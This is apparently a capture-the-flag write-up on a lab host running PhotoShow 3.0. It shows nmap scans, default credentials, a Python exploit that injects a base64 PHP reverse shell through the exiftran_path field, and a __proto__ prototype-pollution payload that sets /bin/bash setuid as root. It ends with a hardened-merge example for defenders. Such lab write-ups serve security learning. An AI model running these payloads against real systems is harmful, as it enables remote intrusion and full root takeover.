Host entries
10.0.160.221
Content
- Default Credentials
- PhotoShow 3.0 - Remote Code Execution (RCE)
- @agreejs/shared Prototype Pollution
Reconnaissance
Initial reconnaissance for TCP ports
nmap -p- -sS --open --min-rate 500 -Pn -n -vvvv -oG allPorts 10.0.160.221
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.0.160.221 () Status: Up
Host: 10.0.160.221 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
Services and Versions running:
nmap -p22,80 -sCV -n -Pn -vvvv -oN targeted 10.0.160.221
Nmap scan report for 10.0.160.221
Host is up, received user-set (0.15s latency).
Scanned at 2025-02-20 19:00:34 EST for 41s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 256 ca:a0:22:83:88:f3:e3:ed:6f:3d:59:ba:bd:3c:f1:6b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHP4VhDww7U3k3GJxGqRFXN6xzDoOuF9TFiuKrlaP+twLHPWCLe1V7JIBgcL1JF3uf0Li/36H99aZbHUKuv7Z98=
| 256 3d:80:07:18:b3:84:60:08:85:c8:68:c9:5a:f1:b0:09 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHOMTnmLCLW8d7QVNNH3UKLr8W03N/+RlL+LN6Nkalcx
80/tcp open http syn-ack ttl 63 nginx 1.18.0
|_http-title: PhotoShow
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-favicon: Unknown favicon MD5: 7D314C14444028B644D54DC1C8F65E43
Exploitation
Besides SSH, the target only exposes an HTTP service, and it serves a PhotoShow CMS. I tried some default credentials against the login and the pair that worked was admin:password.

This CMS is vulnerable to PhotoShow 3.0 - Remote Code Execution (RCE). I downloaded the public script, and after some failed attempts I got a working shell by replacing the script's original bash -c 'bash -i... payload with this one:
import base64
import urllib.parse


def createInjection(attackerIp, attackerNcPort):
    # PHP one-liner: connect back to the listener and attach sh to the socket
    # (fd 3 is the descriptor fsockopen normally gets in a fresh PHP CLI process)
    textToEncode = "php -r '$sock=fsockopen(\"" + attackerIp + "\"," + attackerNcPort + ");exec(\"sh <&3 >&3 2>&3\");'"
    b64Encoded = base64.b64encode(textToEncode.encode("ascii"))
    strb64 = str(b64Encoded)[2:-1]  # strip the b'...' wrapper to get plain base64 text
    # the CMS hands exiftran_path to a shell, so the command is injected there
    injection = {"exiftran_path": "echo " + strb64 + " | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"}
    return urllib.parse.urlencode(injection)
For some reason only the PHP reverse shell payload worked; once it connected back we had a shell as www-data.
Privilege Escalation
I then ran sudo -l and found that www-data can execute one binary as root without a password:
www-data@contract:~/html$ sudo -l
Matching Defaults entries for www-data on contract:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on contract:
(ALL : ALL) NOPASSWD: /usr/bin/agreement
This is the content of it:
www-data@contract:~/html$ cat /usr/bin/agreement
#! /usr/bin/env node
var args = process.argv.slice(2);
(async () => {
const lib = await import('@agreejs/shared');
const { exec } = await import('child_process');
var components=JSON.parse(args[0])
try {
lib.mergeInternalComponents (components)
} catch (e) { }
var user = {}
if(user.authenticated===true)
{
exec(user.cmd);
}
})();
As usual, the vulnerability lies in the imported library, in this case @agreejs/shared, for which a prototype pollution issue leading to remote code execution has been reported. The wrapper passes our JSON straight into lib.mergeInternalComponents() and then checks user.authenticated on a freshly created empty object; if the merge writes into Object.prototype, that check passes on every object in the process and user.cmd is handed to exec() as root. After reading the article and with the aid of DeepSeek I came up with the following payload:
www-data@contract:~/html$ sudo /usr/bin/agreement '{"__proto__":{"authenticated":true,"cmd":"chmod +s /bin/bash"}}'
www-data@contract:~/html$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /bin/bash
And we ARE INSIDEEEE!!!
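To make the sink concrete, here is an added example in Node.js (not the page's code and not @agreejs/shared's code): a small recursive merge with the weakness the agreement wrapper depends on, placed beside a hardened version and driven by the same JSON payload used above. The real implementation of mergeInternalComponents is not shown on this page, so vulnerableMerge is a hypothetical stand-in for it.

```javascript
// Added example (not the page's or @agreejs/shared's code): a minimal
// recursive merge with the weakness the agreement wrapper depends on,
// next to a hardened version. vulnerableMerge is a hypothetical stand-in
// for mergeInternalComponents, whose real code is not on this page.

// Constructed input: the same JSON string passed to sudo /usr/bin/agreement.
const PAYLOAD = '{"__proto__":{"authenticated":true,"cmd":"chmod +s /bin/bash"}}';

// Vulnerable: recurses into target[key] for every key, including "__proto__".
// JSON.parse creates "__proto__" as an own key, and for a plain object
// target["__proto__"] is Object.prototype, so the nested keys land on every
// object in the process.
function vulnerableMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') {
        target[key] = {};
      }
      vulnerableMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: refuse the keys that reach the prototype chain and only recurse
// into properties the target actually owns.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) ||
          target[key] === null || typeof target[key] !== 'object') {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Mirrors the wrapper's logic: merge the attacker JSON into a scratch object,
// then consult a brand-new empty object. Returns what the wrapper would have
// passed to exec() instead of running it, and undoes any pollution afterwards
// so the demonstration does not leave the runtime in a polluted state.
function runAgreement(mergeFn, argJson) {
  const components = JSON.parse(argJson);
  try { mergeFn({}, components); } catch (e) { /* the wrapper swallows errors too */ }
  const user = {};
  const polluted = user.authenticated === true;
  const cmd = polluted ? user.cmd : null;
  delete Object.prototype.authenticated;
  delete Object.prototype.cmd;
  return { polluted, cmd };
}

console.log('vulnerable merge:', runAgreement(vulnerableMerge, PAYLOAD));
// → { polluted: true, cmd: 'chmod +s /bin/bash' }
console.log('hardened merge:  ', runAgreement(safeMerge, PAYLOAD));
// → { polluted: false, cmd: null }
```

The fix belongs in the merge, not in the caller: once Object.prototype has been written, any `user.authenticated` check on a fresh object is already lost. As a runtime-level backstop, Node can also be started with `--disable-proto=delete`, which removes the `__proto__` accessor so such a merge only creates a harmless own property.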
Post Exploitation
Flags are stored at:
/etc/passwd
/etc/shadow
/proc/1/environ
/root
Credentials
- Credentials identified for PhotoShow are
admin:password
Notes
- Public exploits sometimes only work in certain environments; here we had to modify ours to exploit the CMS successfully, so it is a good idea to always have more than one reverse shell payload ready to avoid this scenario.